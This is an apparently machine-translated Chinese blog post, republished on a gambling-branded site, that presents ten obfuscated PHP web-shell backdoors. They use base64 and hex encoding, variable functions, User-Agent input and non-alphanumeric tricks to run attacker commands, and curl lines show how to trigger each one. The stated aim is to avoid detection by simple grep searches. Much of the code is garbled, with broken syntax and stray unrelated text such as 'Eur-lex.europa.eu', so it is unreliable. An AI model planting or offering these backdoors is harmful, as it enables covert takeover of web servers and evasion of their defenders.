风趣的PHP后门 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

风趣的PHP后门

申博_安全预警 申博 147次浏览 已收录 0个评论

媒介

近来我研讨了一种不寻常的小技能,专程撰写这篇文章来与人人分享。这篇文章供应了很多后门代码中运用的exit()基础知识,开箱即用。
这篇文章的关注点在于全局变量GET,POST,REQUEST。

最经常使用的函数

(PHP 4, PHP 5, PHP 7) 
shell_exec - Execute command via shell and return the complete output as a string
 string shell_exec (string $ cmd)
EXEC-> php -r 'shell_exec ("ls -la");'
(PHP 4, PHP 5, PHP 7) 
system - Executes an external program and shows the output
 string system (string $ command [, int & $ return_var])
EXEC-> php -r 'system ("ls -la");'
(PHP 4, PHP 5, 7 PHP) 
exec - Execute external program
 string Exec (Command String $ [, $ & array output [int & return_var $]])
EXEC-> php -r 'exec ("ls -la", $ var); print_r ($ var);'
(PHP 4, PHP 5, PHP 7) 
passthru - Execute an external program and show the raw output
 void passthru (string $ command [, int & $ return_var]) 
EXEC-> php -r 'passthru ("ls -la", $ var); '

简朴的运用

shell_exec: 
 if (isset ($ _ REQUEST ['cmd'])) {$ cmd = shell_exec ($ _ REQUEST ['cmd']);
 print_r ($ cmd);} 
system: 
 if (isset ($ _ REQUEST ['cmd'])) {system ($ _ REQUEST ['cmd']); }
exec:
 if (isset ($ _ REQUEST ['cmd'])) {exec ($ _ REQUEST ['cmd']); }
passthru:
 if (isset ($ _ REQUEST ['cmd'])) {passthru ($ _ REQUEST ['cmd']); }

我们能够运用雷同的函数,但要精心设计,制止运用简朴的“grep-E”来显现我们的接见权限。

TIPS

在固定值中运用shellcode
能够不加控制地运用数组
当地函数的衔接和变量的界说
base64_decode – encode (data), bin2hex, error_reporting (0)
运用体系上已存在的要求(GET或POST)。
研讨歹意属性在体系类中的建立,建立其函数。
处置惩罚全局变量$ _SERVER的值。
研讨PHP花样CMS文件的沾染要领。

示例

示例01

函数:
1.ERROR_REPORTING
2.BASE64_DECODE
3.DEFINE
4.SYSTEM
5.EXIT
变量:

c3lzdGVt = system, dW5hbWUgLWE7bHM7 = uname -a; ls; , aWQ = = id

CODE:

(error_reporting (0)) ($ __ = @ base64_decode ("c3lzdGVt")) $ __ ( base64_decode ("aWQ ="))
. define ("_", "dW5hbWUgLWE7bHM7"). __ ( base64_decode (_)). exit );

实行:

curl -v ‘http://localhost/shell.php'

示例02

函数:
1.ERROR_REPORTING
2.BASE64_DECODE
3.ISSET
4.PRINT
5.SYSTEM
6.EXIT
变量:

c3lzdGVt = system

CODE:

(error_reporting (0) (= @ $ __. base64_decode ( "c3lzdGVt"))
 . print ($ __ ( Isset ($ _REQUEST [0]) REQUEST $ _ [0] NULL))?. EXIT );

实行:

curl -v ‘http://localhost/shell.php?0=id'

示例03

函数:
1.ERROR_REPORTING
2.BASE64_DECODE
3.CREATE_FUNCTION — 建立匿名函数(lambda款式)。
4.SHELL_EXEC
5.EXIT
变量:

ZWNobyhzaGVsbF9leGVjKCRfKSk7 = echo (shell_exec ($ _));

CODE:

( Error_reporting (0)) ($ _ = $ _ REQUEST [0]).
 ($ __ = @. Create_function ( '$ _' base64_decode ( "ZWNobyhzaGVsbF9leGVjKCRfKSk7"))) ($ __ ($ _) exit..);

实行:

curl -v ‘http://localhost/shell.php?0=id'

示例04

函数:
1.ERROR_REPORTING
2.VARIABLE FUNCTIONS
3.EXIT
变量:

$ _GET [1] = Function name, $ _GET [2] = command that will execute

CODE:

( Error_reporting (0) (= @ $ _ $ _ GET [1]) (.. $ _ ($ _GET [2])). EXIT );

实行:

curl -v ‘http://localhost/shell.php?1=system&2=id;uname'

示例05

函数:
1.ERROR_REPORTING
2.EXTRACT
3.GET_DEFINED_VARS
4.VARIABLE FUNCTIONS
5.DEFINE
6.EXIT
变量:

$ _REQUEST [1] = Function name, $ _REQUEST [2] = command that will execute

CODE:

————————————-

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

( error_reporting (0)). ( extract ($ _REQUEST, EXTR_PREFIX_ALL))
($ _ = @ get_defined_vars () ['_ REQUEST']) ( define ('_', $ _ [2])) (($ _ [1] (_));

示例06

函数:

1.ERROR_REPORTING
2.EXPLODE
3.BASE64_DECODE
4.VARIABLE FUNCTIONS
5.EXIT
变量:

SFRUUF9VU0VSX0FHRU5U = HTTP_USER_AGENT

CODE:

( error_reporting (0)). ($ _ = @ explode (',', $ _ SERVER [ base64_decode ('SFRUUF9VU0VSX0FHRU5U')]))
($ _ [0] ("{$ _ [1]")). exit ;

示例07

函数:

1.ERROR_REPORTING
2.GET_DEFINED_VARS
3.VARIABLE FUNCTIONS
4.VARIABLE SHELLCODE
5.SYSTEM
6.EXIT
变量:

\x30=0, \x73=s, \x79=y, \x73=s, \x74=t, \x65=e, \x6D=m

CODE:

( error_reporting (0)). ($ _ [0] [] = @ $ _ GET ["\ x30"])
($ _ [1] [] = "\ x73") ($ _ [1] [] = "\ x79").
($ _ [1] [] = "\ x6D") ($ _ [1] [] = "\ x65").($ ___. = $ __ [0]) 
($ __ = @ get_defined_vars () ['_'] [1])
($ ___. = $ __ [1]) ($ ___. = $ __ [2]) ($ ___. = $ __ [3])
. ($ = ___ __ $ [4].) ($ = $ __ ___ [5].) (($ ___ ( "{$ _ [0] [0]}"))... EXIT );
Execution: curl -v ‘http://localhost/shell.php?0=id;uname%20-a'

示例08

函数:
1.ERROR_REPORTING
2.STR_REPLACE
3.VARIABLE FUNCTIONS
Variables:

$ _REQUEST [0] = Command that will execute

CODE:

( error_reporting (0)). ( str_replace ('$', '@', '#')
 , 's $ ## and @ # $ @ # $ @ # $ @ s $ # $ @ # $ ($ _ {$ _ REQUEST [0]}));

实行:

curl -v ‘http://localhost/shell.php?0=id

示例09

函数:

1.ERROR_REPORTING
2.STR_REPLACE
3.VARIABLE FUNCTIONS
4.SYSTEM
变量:

$ _POST [‘shellrox’] = Command that will execute

CODE:

( error_reporting (0)). ($ _ = [("\ x73 \ x79").
("\ x74 \ x65 \ x6d"), "\ x73 \ x68 \ x65 \ x6c", "\ x6c \ x72 \ x6f \ x78"
($ _ [0] ($ _ POST [$ _ [1]. $ _ [2]]));

实行:

curl -d “shellrox=id;uname -a” -X POST ‘http://localhost/shell.php'

示例10

函数:

1.NON ALPHA NUMERIC
2.VARIABLE FUNCTIONS
3.SYSTEM
CODE:

$ _ = ""; # we need a blank string to start
Eur-lex.europa.eu eur-lex.europa.eu # access part of the string to convert to an array
$ _ = $ _. ""; # convert the array into a string of "Array"
Eur-lex.europa.eu eur-lex.europa.eu # access the 0 index of the string "Array" which is "A"
# INCREASING VALUES TO FIND THE LETTERS
# IF YOU WANT TO MOUNT THE STRING SYSTEM
($ _ ++); #THE
($ _ ++); #B
($ _ ++); #W
($ _ ++); #D
# FIRST LETTER FOUND IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++);
($ _ ++); #F
($ _ ++); #G
($ _ ++); #H
($ _ ++); #I
($ _ ++); #J
($ _ ++); #K
($ _ ++); #L
# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++); # M
($ _ ++); #N
($ _ ++); #O
($ _ ++); #P
($ _ ++); #Q
($ _ ++); #R
# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++);
# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++); # T
($ _ ++); #U
($ _ ++); #V
($ _ ++); #W
($ _ ++); #X
# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++);
(Z)

# ARRAY DEBUG:
/ * Array
(
    [0] => E
    [1] => M
    [2] => S
    [3] => T
    [4] => Y
)
* /
# MOUNT STRING WITH ARRAY FIELDS $ ___  
$ ___ [2]. $ ___ [4]. $ ___ [2]. $ ___ [3]. ___ [0]. ___ [1];
# USING ANONYMOUS FUNCTION TECHNIQUE FOR IMPLEMENTATION
$ _____ ('id; uname -a');

极简版本(MINIMALIST VERSION:)

($ _ = $ _ [+] "). ($ _ ++). ($ _ = $ _.
($ _ ++). ($ _ ++). ($ _ ++) ($ _ ++).
($ _ ++). ($ _ ++). ($ _ ++). ($ _ ++).
($ _ ++). ($ _ ++). ($ _ ++). ($ _ ++).
($ _ ++). ($ _ ++). ($ _ ++).
($ ___ [] = $ _ ++). ($ _ ++)
(_____ = $ ___ [2]. $ ___ [4]. ___ [2]. ___ [3]. ___ [0]. ___ [1])
($ _____ ('id; uname -a'));

Execution: curl -v 'http://localhost/shell.php'

申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明风趣的PHP后门
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址